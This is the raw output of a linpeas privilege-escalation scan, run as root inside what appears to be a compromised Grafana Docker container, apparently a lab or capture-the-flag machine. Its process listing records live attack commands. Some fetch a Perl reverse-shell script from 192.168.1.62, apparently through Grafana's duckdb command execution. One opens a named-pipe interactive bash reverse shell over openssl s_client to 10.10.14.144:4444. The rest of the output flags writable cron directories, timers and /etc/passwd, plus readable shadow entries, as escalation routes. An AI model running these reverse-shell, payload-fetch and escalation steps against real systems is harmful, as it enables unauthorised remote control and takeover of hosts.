Process 13109 (root) - sh -c wget http://192.168.1.62:4444/perl-reverse-shell.pl -o /tmp/rev.pl >/tmp/grafana_cmd_output 2>
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)

Process 13110 (root) - wget http://192.168.1.62:4444/perl-reverse-shell.pl -o /tmp/rev.pl 
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)

Process 13111 (root) - /usr/local/bin/duckdb  
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)

Process 13117 (root) - sh -c wget http://192.168.1.62:8000/perl-reverse-shell.pl -o /tmp/rev.pl >/tmp/grafana_cmd_output 2>
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)

Process 13118 (root) - wget http://192.168.1.62:8000/perl-reverse-shell.pl -o /tmp/rev.pl 
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)

Process 13221 (root) - /usr/sbin/apache -i 
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)

Process 13235 (root) - /bin/sh ./linpeas.sh 
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)


╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#credentials-from-process-memory                      
gdm-password Not Found                                                                                                                 
gnome-keyring-daemon Not Found                                                                                                         
lightdm Not Found                                                                                                                      
vsftpd Not Found                                                                                                                       
apache2 Not Found                                                                                                                      
sshd: Not Found                                                                                                                        
mysql Not Found                                                                                                                        
postgres Not Found                                                                                                                     
redis-server Not Found                                                                                                                 
mongod Not Found                                                                                                                       
memcached Not Found                                                                                                                    
elasticsearch Not Found                                                                                                                
jenkins Not Found                                                                                                                      
tomcat Not Found                                                                                                                       
nginx Not Found                                                                                                                        
php-fpm Not Found                                                                                                                      
supervisord Not Found                                                                                                                  
vncserver Not Found                                                                                                                    
xrdp Not Found                                                                                                                         
teamviewer Not Found                                                                                                                   
                                                                                                                                       
╔══════════╣ Opened Files by processes
Process 1 (root) - grafana server --homepath=/usr/share/grafana --config=/etc/grafana/grafana.ini --packaging=docker cf                
  └─ Has open files:
    └─ pipe:[19656]
    └─ /var/lib/grafana/grafanadb.db
    └─ pipe:[464898]
    └─ pipe:[165021]
    └─ pipe:[464899]
    └─ pipe:[21104]
    └─ pipe:[165022]
    └─ pipe:[19657]
    └─ pipe:[21105]
    └─ pipe:[464731]
    └─ pipe:[464732]
    └─ pipe:[19333]
Process 69 (root) - /usr/local/bin/duckdb  
  └─ Has open files:
    └─ pipe:[21103]
    └─ pipe:[21104]
    └─ pipe:[21105]
    └─ pipe:[20463]
Process 75 (root) - sh -c cat /tmp/f | /bin/bash -i 2>&1 | openssl s_client -quiet -connect 10.10.14.144:4444 > /tmp/f
 
  └─ Has open files:
    └─ pipe:[21103]
    └─ pipe:[20463]
    └─ pipe:[21105]
Process 76 (root) - cat /tmp/f 
  └─ Has open files:
    └─ pipe:[21103]
    └─ pipe:[21107]
    └─ pipe:[21105]
    └─ /tmp/f
Process 77 (root) - /bin/bash -i 
  └─ Has open files:
    └─ pipe:[21107]
    └─ pipe:[21108]
Process 78 (root) - openssl s_client -quiet -connect 10.10.14.144:4444 
  └─ Has open files:
    └─ pipe:[21108]
    └─ /tmp/f
    └─ pipe:[21105]
Process 236 (root) - /usr/local/bin/duckdb  
  └─ Has open files:
    └─ pipe:[165020]
    └─ pipe:[165021]
    └─ pipe:[165022]
    └─ pipe:[165028]
Process 242 (root) - sh -c bash /tmp/rev  
  └─ Has open files:
    └─ pipe:[165020]
    └─ pipe:[165028]
    └─ pipe:[165022]
Process 243 (root) - bash /tmp/rev 
  └─ Has open files:
    └─ pipe:[165020]
    └─ pipe:[165028]
    └─ pipe:[165022]
    └─ /tmp/rev (deleted)
Process 289 (root) - cat f 
  └─ Has open files:
    └─ /tmp/f
Process 8824 (root) - bash -c ((( echo cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001 0001 | x
  └─ Has open files:
    └─ pipe:[187243]
Process 8825 (root) - bash -c ((( echo cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001 0001 | x
  └─ Has open files:
    └─ pipe:[187243]
Process 8826 (root) - grep accessible 
  └─ Has open files:
    └─ pipe:[187243]
Process 8830 (root) - dd bs=9000 count=1 
  └─ Has open files:
    └─ pipe:[187271]
Process 13103 (root) - /usr/local/bin/duckdb  
  └─ Has open files:
    └─ pipe:[464897]
    └─ pipe:[464898]
    └─ pipe:[464899]
    └─ pipe:[464905]
Process 13109 (root) - sh -c wget http://192.168.1.62:4444/perl-reverse-shell.pl -o /tmp/rev.pl >/tmp/grafana_cmd_output 2>
  └─ Has open files:
    └─ pipe:[464897]
    └─ /tmp/grafana_cmd_output
    └─ pipe:[464905]
    └─ pipe:[464899]
Process 13110 (root) - wget http://192.168.1.62:4444/perl-reverse-shell.pl -o /tmp/rev.pl 
  └─ Has open files:
    └─ pipe:[464897]
    └─ /tmp/grafana_cmd_output
    └─ /tmp/rev.pl
Process 13111 (root) - /usr/local/bin/duckdb  
  └─ Has open files:
    └─ pipe:[464730]
    └─ pipe:[464731]
    └─ pipe:[464732]
    └─ pipe:[464738]
Process 13117 (root) - sh -c wget http://192.168.1.62:8000/perl-reverse-shell.pl -o /tmp/rev.pl >/tmp/grafana_cmd_output 2>
  └─ Has open files:
    └─ pipe:[464730]
    └─ /tmp/grafana_cmd_output
    └─ pipe:[464738]
    └─ pipe:[464732]
Process 13118 (root) - wget http://192.168.1.62:8000/perl-reverse-shell.pl -o /tmp/rev.pl 
  └─ Has open files:
    └─ pipe:[464730]
    └─ /tmp/grafana_cmd_output
    └─ /tmp/rev.pl

╔══════════╣ Processes with memory-mapped credential files
                                                                                                                                       
╔══════════╣ Processes whose PPID belongs to a different user (not root)
╚ You will know if a user can somehow spawn processes as a different user                                                              
                                                                                                                                       
╔══════════╣ Check for vulnerable cron jobs
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs                                   
══╣ Cron jobs list                                                                                                                     
crontab Not Found                                                                                                                      
incrontab Not Found                                                                                                                    
/etc/cron.d:                                                                                                                           
total 12
drwxr-xr-x 2 root root 4096 Apr 27  2024 .
drwxr-xr-x 1 root root 4096 Apr  4 10:23 ..
-rw-r--r-- 1 root root  201 Jan  8  2022 e2scrub_all

/etc/cron.daily:
total 16
drwxr-xr-x 2 root root 4096 Apr 27  2024 .
drwxr-xr-x 1 root root 4096 Apr  4 10:23 ..
-rwxr-xr-x 1 root root 1478 Apr  8  2022 apt-compat
-rwxr-xr-x 1 root root  123 Dec  5  2021 dpkg

══╣ Checking for specific cron jobs vulnerabilities
Checking cron directories...                                                                                                           
Writable cron directory: /etc/cron.d
Writable cron directory: /etc/cron.daily

╔══════════╣ System timers
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#timers                                               
══╣ Active timers:                                                                                                                     
══╣ Disabled timers:                                                                                                                   
══╣ Additional timer files:                                                                                                            
Potential privilege escalation in timer file: /etc/systemd/system/timers.target.wants/apt-daily-upgrade.timer                          
  └─ WRITABLE_FILE: Timer target file is writable: /usr/lib/systemd/system/apt-daily-upgrade.timer
Potential privilege escalation in timer file: /etc/systemd/system/timers.target.wants/apt-daily.timer
  └─ WRITABLE_FILE: Timer target file is writable: /usr/lib/systemd/system/apt-daily.timer
Potential privilege escalation in timer file: /etc/systemd/system/timers.target.wants/dpkg-db-backup.timer
  └─ WRITABLE_FILE: Timer target file is writable: /usr/lib/systemd/system/dpkg-db-backup.timer
Potential privilege escalation in timer file: /etc/systemd/system/timers.target.wants/e2scrub_all.timer
  └─ WRITABLE_FILE: Timer target file is writable: /usr/lib/systemd/system/e2scrub_all.timer
Potential privilege escalation in timer file: /etc/systemd/system/timers.target.wants/fstrim.timer
  └─ WRITABLE_FILE: Timer target file is writable: /usr/lib/systemd/system/fstrim.timer
Potential privilege escalation in timer file: /etc/systemd/system/timers.target.wants/motd-news.timer
  └─ WRITABLE_FILE: Timer target file is writable: /usr/lib/systemd/system/motd-news.timer
Potential privilege escalation in timer file: /usr/lib/systemd/system/apt-daily-upgrade.timer
  └─ WRITABLE_FILE: Timer file is writable
Potential privilege escalation in timer file: /usr/lib/systemd/system/apt-daily.timer
  └─ WRITABLE_FILE: Timer file is writable
Potential privilege escalation in timer file: /usr/lib/systemd/system/dpkg-db-backup.timer
  └─ WRITABLE_FILE: Timer file is writable
Potential privilege escalation in timer file: /usr/lib/systemd/system/e2scrub_all.timer
  └─ WRITABLE_FILE: Timer file is writable
Potential privilege escalation in timer file: /usr/lib/systemd/system/fstrim.timer
  └─ WRITABLE_FILE: Timer file is writable
Potential privilege escalation in timer file: /usr/lib/systemd/system/motd-news.timer
  └─ WRITABLE_FILE: Timer file is writable
Potential privilege escalation in timer file: /var/lib/systemd/deb-systemd-helper-enabled/timers.target.wants/apt-daily-upgrade.timer
  └─ WRITABLE_FILE: Timer file is writable
Potential privilege escalation in timer file: /var/lib/systemd/deb-systemd-helper-enabled/timers.target.wants/apt-daily.timer
  └─ WRITABLE_FILE: Timer file is writable
Potential privilege escalation in timer file: /var/lib/systemd/deb-systemd-helper-enabled/timers.target.wants/dpkg-db-backup.timer
  └─ WRITABLE_FILE: Timer file is writable
Potential privilege escalation in timer file: /var/lib/systemd/deb-systemd-helper-enabled/timers.target.wants/e2scrub_all.timer
  └─ WRITABLE_FILE: Timer file is writable
Potential privilege escalation in timer file: /var/lib/systemd/deb-systemd-helper-enabled/timers.target.wants/fstrim.timer
  └─ WRITABLE_FILE: Timer file is writable
Potential privilege escalation in timer file: /var/lib/systemd/deb-systemd-helper-enabled/timers.target.wants/motd-news.timer
  └─ WRITABLE_FILE: Timer file is writable

╔══════════╣ Services and Service Files
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#services                                             
                                                                                                                                       
══╣ Active services:
                                                                                                                                       
══╣ Disabled services:
                                                                                                                                       
══╣ Additional service files:
You can't write on systemd PATH                                                                                                        

╔══════════╣ Systemd Information
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths                        
═╣ Systemd version and vulnerabilities? .............. systemctl Not Found                                                             
═╣ Services running as root? ..... systemctl Not Found                                                                                 
                                                                                                                                       
═╣ Running services with dangerous capabilities? ... systemctl Not Found
                                                                                                                                       
═╣ Services with writable paths? . systemctl Not Found
                                                                                                                                       

╔══════════╣ Systemd PATH
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths                        
systemctl Not Found                                                                                                                    
                                                                                                                                       
╔══════════╣ D-Bus Analysis
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#d-bus                                                
busctl Not Found                                                                                                                       
                                                                                                                                       


                              ╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════                                                    
                              ╚═════════════════════╝                                                                                  
╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information                                                                    
link-local 169.254.0.0
Network Interfaces from /proc/net/dev:
----------------------------------------
Interface: lo
  MAC: 00:00:00:00:00:00
  State: unknown

Interface: eth0
  MAC: 02:42:ac:11:00:02
  State: up

Additional IP Information from fib_trie:
----------------------------------------
Network: 

╔══════════╣ Hostname, hosts and DNS
══╣ Hostname Information                                                                                                               
System hostname: 7ce659d667d7                                                                                                          
FQDN: 7ce659d667d7

══╣ Hosts File Information
Contents of /etc/hosts:                                                                                                                
  127.0.0.1     localhost
  ::1   localhost ip6-localhost ip6-loopback
  fe00::0       ip6-localnet
  ff00::0       ip6-mcastprefix
  ff02::1       ip6-allnodes
  ff02::2       ip6-allrouters
  172.17.0.2    7ce659d667d7

══╣ DNS Configuration
DNS Servers (resolv.conf):                                                                                                             
  8.8.8.8
  8.8.4.4
  search .
-e 
DNS Domain Information:
(none)

╔══════════╣ Active Ports
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports                                           
══╣ Active tcp Ports (from /proc/net/tcp)                                                                                              
Proto  Recv-Q  Send-Q  Local Address          Foreign Address        State       PID/Program name                                      
--------------------------------------------------------------------------------

══╣ Active udp Ports (from /proc/net/udp)
Proto  Recv-Q  Send-Q  Local Address          Foreign Address        State       PID/Program name                                      
--------------------------------------------------------------------------------


╔══════════╣ Network Traffic Analysis Capabilities
                                                                                                                                       
══╣ Available Sniffing Tools
No sniffing tools found                                                                                                                

══╣ Network Interfaces Sniffing Capabilities
Interface eth0: Not sniffable                                                                                                          
No sniffable interfaces found

╔══════════╣ Firewall Rules Analysis
                                                                                                                                       
══╣ Iptables Rules
iptables Not Found                                                                                                                     
                                                                                                                                       
══╣ Nftables Rules
nftables Not Found                                                                                                                     
                                                                                                                                       
══╣ Firewalld Rules
firewalld Not Found                                                                                                                    
                                                                                                                                       
══╣ UFW Rules
ufw Not Found                                                                                                                          
                                                                                                                                       
╔══════════╣ Inetd/Xinetd Services Analysis
                                                                                                                                       
══╣ Inetd Services
inetd Not Found                                                                                                                        
                                                                                                                                       
══╣ Xinetd Services
xinetd Not Found                                                                                                                       
                                                                                                                                       
══╣ Running Inetd/Xinetd Services
-e                                                                                                                                     
Running Service Processes:

╔══════════╣ Internet Access?
  ping not found                                                                                                                       
Port 80 is not accessible
DNS is not accessible
Port 443 is not accessible
DNS is not accessible
Port 443 is not accessible













Port 443 is not accessible with curl






                               ╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════                                                    
                               ╚═══════════════════╝                                                                                   
╔══════════╣ My user
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#users                                                
uid=0(root) gid=0(root) groups=0(root)                                                                                                 

╔══════════╣ PGP Keys and Related Files
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#pgp-keys                                             
GPG:                                                                                                                                   
gpg Not Found
-e                                                                                                                                     
NetPGP:
netpgpkeys Not Found
-e                                                                                                                                     
PGP Related Files:

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid                                        
                                                                                                                                       


╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#reusing-sudo-tokens                                  
ptrace protection is enabled (1)                                                                                                       

doas.conf Not Found
                                                                                                                                       
╔══════════╣ Checking Pkexec and Polkit
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html#pe---method-2            
                                                                                                                                       
══╣ Polkit Binary
                                                                                                                                       
══╣ Polkit Policies
                                                                                                                                       
══╣ Polkit Authentication Agent
                                                                                                                                       
╔══════════╣ Superusers and UID 0 Users
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html                          
                                                                                                                                       
══╣ Users with UID 0 in /etc/passwd
root:x:0:0:root:/root:/bin/bash                                                                                                        

══╣ Users with sudo privileges in sudoers
                                                                                                                                       
╔══════════╣ Users with console
root:x:0:0:root:/root:/bin/bash                                                                                                        

╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)                                                                                                 
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=472(grafana) gid=0(root) groups=0(root)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)

╔══════════╣ Currently Logged in Users
                                                                                                                                       
══╣ Basic user information
 09:48:31 up 20:15,  0 users,  load average: 0.23, 0.10, 0.02                                                                          
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT

══╣ Active sessions
 09:48:31 up 20:15,  0 users,  load average: 0.23, 0.10, 0.02                                                                          
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT

══╣ Logged in users (utmp)
                                                                                                                                       
══╣ SSH sessions
                                                                                                                                       
══╣ Screen sessions
                                                                                                                                       
══╣ Tmux sessions
                                                                                                                                       
╔══════════╣ Last Logons and Login History
                                                                                                                                       
══╣ Last logins
                                                                                                                                       
wtmp begins Fri Feb 28 19:19:29 2025

══╣ Failed login attempts
                                                                                                                                       
btmp begins Fri Feb 28 19:19:29 2025

══╣ Recent logins from auth.log (limit 20)
                                                                                                                                       
══╣ Last time logon each user
Username         Port     From             Latest                                                                                      

╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)                                                                                                                       
                                                                                                                                       
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
                                                                                                                                       


                             ╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════                                                     
                             ╚══════════════════════╝                                                                                  
╔══════════╣ Useful software
/usr/bin/base64                                                                                                                        
/usr/bin/curl
/usr/bin/perl
/usr/bin/wget

╔══════════╣ Installed Compilers
                                                                                                                                       
╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Apr 27  2024 /etc/pam.d                                                                                    


╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'                                                                                   
drwxr-xr-x 2 root root 4096 May 14  2024 /etc/ldap


╔══════════╣ Analyzing Grafana Files (limit 70)
-rw-r--r-- 1 root root 67063 May 14  2024 /etc/grafana/grafana.ini                                                                     
[paths]
[server]
[server.custom_response_headers]
[database]
[datasources]
[remote_cache]
[dataproxy]
[analytics]
[security]
[security.encryption]
[snapshots]
[dashboards]
[users]
[secretscan]
[service_accounts]
[auth]
[auth.anonymous]
[auth.github]
[auth.gitlab]
[auth.google]
[auth.grafana_com]
[auth.azuread]
[auth.okta]
[auth.generic_oauth]
[auth.basic]
[auth.proxy]
[auth.jwt]
[auth.ldap]
[aws]
[azure]
[rbac]
[smtp]
[smtp.static_headers]
[emails]
[log]
[log.console]
[log.file]
[log.syslog]
[log.frontend]
[quota]
[unified_alerting]
[unified_alerting.reserved_labels]
[unified_alerting.state_history]
[unified_alerting.state_history.external_labels]
[unified_alerting.state_history.annotations]
max_age =
max_annotations_to_keep =
[annotations]
[annotations.dashboard]
[annotations.api]
[explore]
[help]
[profile]
[news]
[query]
[query_history]
[metrics]
[metrics.environment_info]
[metrics.graphite]
[grafana_com]
[tracing.jaeger]
[tracing.opentelemetry]
[tracing.opentelemetry.jaeger]
[tracing.opentelemetry.otlp]
[external_image_storage]
[external_image_storage.s3]
[external_image_storage.webdav]
[external_image_storage.gcs]
[external_image_storage.azure_blob]
[external_image_storage.local]
[rendering]
[panels]
[plugins]
[live]
[plugin.grafana-image-renderer]
[support_bundles]
[enterprise]
[feature_toggles]
[date_formats]
[expressions]
[geomap]
[navigation.app_sections]
[navigation.app_standalone_pages]
[secure_socks_datasource_proxy]
[feature_management]
[public_dashboards]

╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 4096 Apr  8  2022 /etc/apt/keyrings                                                                             
drwxr-xr-x 2 root root 4096 Apr 27  2024 /usr/share/keyrings




╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3771 Jan  6  2022 /etc/skel/.bashrc                                                                             
-rw-r--r-- 1 root root 3106 Oct 15  2021 /root/.bashrc





-rw-r--r-- 1 root root 807 Jan  6  2022 /etc/skel/.profile
-rw-r--r-- 1 root root 161 Jul  9  2019 /root/.profile






MySQL process not found.
╔══════════╣ Analyzing PGP-GPG Files (limit 70)
gpg Not Found                                                                                                                          
netpgpkeys Not Found                                                                                                                   
netpgp Not Found                                                                                                                       
                                                                                                                                       
-rw-r--r-- 1 root root 2794 Mar 26  2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
-rw-r--r-- 1 root root 1733 Mar 26  2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
-rw-r--r-- 1 root root 7399 Sep 17  2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27  2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 3023 Mar 26  2021 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17  2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27  2010 /usr/share/keyrings/ubuntu-master-keyring.gpg


╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd                                                                                                         
passwd file: /etc/passwd
passwd file: /usr/share/lintian/overrides/passwd

╔══════════╣ Searching ssl/ssh files
══╣ Some certificates were found (out limited):                                                                                        
/etc/ssl/certs/ACCVRAIZ1.pem                                                                                                           
/etc/ssl/certs/AC_RAIZ_FNMT-RCM.pem
/etc/ssl/certs/AC_RAIZ_FNMT-RCM_SERVIDORES_SEGUROS.pem
/etc/ssl/certs/ANF_Secure_Server_Root_CA.pem
/etc/ssl/certs/Actalis_Authentication_Root_CA.pem
/etc/ssl/certs/AffirmTrust_Commercial.pem
/etc/ssl/certs/AffirmTrust_Networking.pem
/etc/ssl/certs/AffirmTrust_Premium.pem
/etc/ssl/certs/AffirmTrust_Premium_ECC.pem
/etc/ssl/certs/Amazon_Root_CA_1.pem
/etc/ssl/certs/Amazon_Root_CA_2.pem
/etc/ssl/certs/Amazon_Root_CA_3.pem
/etc/ssl/certs/Amazon_Root_CA_4.pem
/etc/ssl/certs/Atos_TrustedRoot_2011.pem
/etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.pem
/etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068_2.pem
/etc/ssl/certs/Baltimore_CyberTrust_Root.pem
/etc/ssl/certs/Buypass_Class_2_Root_CA.pem
/etc/ssl/certs/Buypass_Class_3_Root_CA.pem
/etc/ssl/certs/CA_Disig_Root_R2.pem
13235PSTORAGE_CERTSBIN





                      ╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════                                                     
                      ╚════════════════════════════════════╝                                                                           
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid                                        
strings Not Found                                                                                                                      
strace Not Found                                                                                                                       
-rwsr-xr-x 1 root root 35K Apr  9  2024 /usr/bin/umount  --->  BSD/Linux(08-1996)                                                      
-rwsr-xr-x 1 root root 47K Apr  9  2024 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 59K Feb  6  2024 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)                                                                                                                        
-rwsr-xr-x 1 root root 44K Feb  6  2024 /usr/bin/chsh
-rwsr-xr-x 1 root root 40K Feb  6  2024 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 72K Feb  6  2024 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 55K Apr  9  2024 /usr/bin/su
-rwsr-xr-x 1 root root 71K Feb  6  2024 /usr/bin/gpasswd

╔══════════╣ SGID
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid                                        
-rwxr-sr-x 1 root shadow 23K Jan 10  2024 /usr/sbin/pam_extrausers_chkpwd                                                              
-rwxr-sr-x 1 root shadow 27K Jan 10  2024 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 71K Feb  6  2024 /usr/bin/chage
-rwxr-sr-x 1 root shadow 23K Feb  6  2024 /usr/bin/expiry

╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#acls                                                 
files with acls in searched folders Not Found                                                                                          
                                                                                                                                       
╔══════════╣ Capabilities
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#capabilities                                         
══╣ Current shell capabilities                                                                                                         
CapInh: 0000000000000000                                                                                                               
CapPrm: 00000000a00425fb
CapEff: 00000000a00425fb
CapBnd: 00000000a00425fb
CapAmb: 0000000000000000

══╣ Parent proc capabilities
CapInh: 0000000000000000                                                                                                               
CapPrm: 00000000a00425fb
CapEff: 00000000a00425fb
CapBnd: 00000000a00425fb
CapAmb: 0000000000000000


Files with capabilities (limited to 50):

╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#profiles-files                                       
                                                                                                                                       
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#init-initd-systemd-and-rcd                           
                                                                                                                                       
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable                                                                      
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. root:*:19840:0:99999:7:::                                                                    
daemon:*:19840:0:99999:7:::
bin:*:19840:0:99999:7:::
sys:*:19840:0:99999:7:::
sync:*:19840:0:99999:7:::
games:*:19840:0:99999:7:::
man:*:19840:0:99999:7:::
lp:*:19840:0:99999:7:::
mail:*:19840:0:99999:7:::
news:*:19840:0:99999:7:::
uucp:*:19840:0:99999:7:::
proxy:*:19840:0:99999:7:::
www-data:*:19840:0:99999:7:::
backup:*:19840:0:99999:7:::
list:*:19840:0:99999:7:::
irc:*:19840:0:99999:7:::
gnats:*:19840:0:99999:7:::
nobody:*:19840:0:99999:7:::
_apt:*:19840:0:99999:7:::
grafana:*:19857:0:99999:7:::
root:*:19840:0:99999:7:::
daemon:*:19840:0:99999:7:::
bin:*:19840:0:99999:7:::
sys:*:19840:0:99999:7:::
sync:*:19840:0:99999:7:::
games:*:19840:0:99999:7:::
man:*:19840:0:99999:7:::
lp:*:19840:0:99999:7:::
mail:*:19840:0:99999:7:::
news:*:19840:0:99999:7:::
uucp:*:19840:0:99999:7:::
proxy:*:19840:0:99999:7:::
www-data:*:19840:0:99999:7:::
backup:*:19840:0:99999:7:::
list:*:19840:0:99999:7:::
irc:*:19840:0:99999:7:::
gnats:*:19840:0:99999:7:::
nobody:*:19840:0:99999:7:::
_apt:*:19840:0:99999:7:::
grafana:*:19857:0:99999:7:::
root:*::
daemon:*::
bin:*::
sys:*::
adm:*::
tty:*::
disk:*::
lp:*::
mail:*::
news:*::
uucp:*::
man:*::
proxy:*::
kmem:*::
dialout:*::
fax:*::
voice:*::
cdrom:*::
floppy:*::
tape:*::
sudo:*::
audio:*::
dip:*::
www-data:*::
backup:*::
operator:*::
list:*::
irc:*::
src:*::
gnats:*::
shadow:*::
utmp:*::
video:*::
sasl:*::
plugdev:*::
staff:*::
games:*::
users:*::
nogroup:*::
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No                                                                                           
═╣ Can I read opasswd file? ............. ═╣ Can I write in network-scripts? ...... No                                                 
═╣ Can I read root folder? .............. total 16                                                                                     
drwx------ 1 root root 4096 Apr  4 12:43 .
drwxr-xr-x 1 root root 4096 Aug  9 09:44 ..
lrwxrwxrwx 1 root root    9 Apr  4 12:42 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Oct 15  2021 .bashrc
-rw-r--r-- 1 root root  161 Jul  9  2019 .profile

╔══════════╣ Searching root files in home dirs (limit 30)
/home/                                                                                                                                 
/root/
/root/.profile
/root/.bashrc
/root/.bash_history



                            ╔═════════════════════════╗
════════════════════════════╣ Other Interesting Files ╠════════════════════════════                                                    
                            ╚═════════════════════════╝                                                                                
╔══════════╣ .sh files in path
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scriptbinaries-in-path                               
                                                                                                                                       
╔══════════╣ Executable files potentially added by user (limit 70)
2025-04-04+10:23:10.5977493970 /.dockerenv                                                                                             

╔══════════╣ Unexpected in root
/run.sh                                                                                                                                
/linpeas.sh
/.dockerenv

╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/tmp/rev.pl                                                                                                                            

╔══════════╣ Syslog configuration (limit 50)
syslog configuration Not Found                                                                                                         
╔══════════╣ Auditd configuration (limit 50)                                                                                           
auditd configuration Not Found                                                                                                         
╔══════════╣ Log files with potentially weak perms (limit 50)                                                                          
   135938     12 -rw-r-----   1 root     adm          8481 Feb 28 20:00 /var/log/apt/term.log                                          

╔══════════╣ Files inside /usr/share/grafana (limit 20)
total 80                                                                                                                               
drwxr-xr-x  1 root    root  4096 Aug  9 09:39 .
drwxr-xr-x  1 root    root  4096 May 14  2024 ..
drwxrwxrwx  2 grafana root  4096 May 14  2024 .aws
-rw-------  1 root    root   207 Aug  9 03:21 .bash_history
drwxr-xr-x  3 root    root  4096 Mar  1 18:01 .duckdb
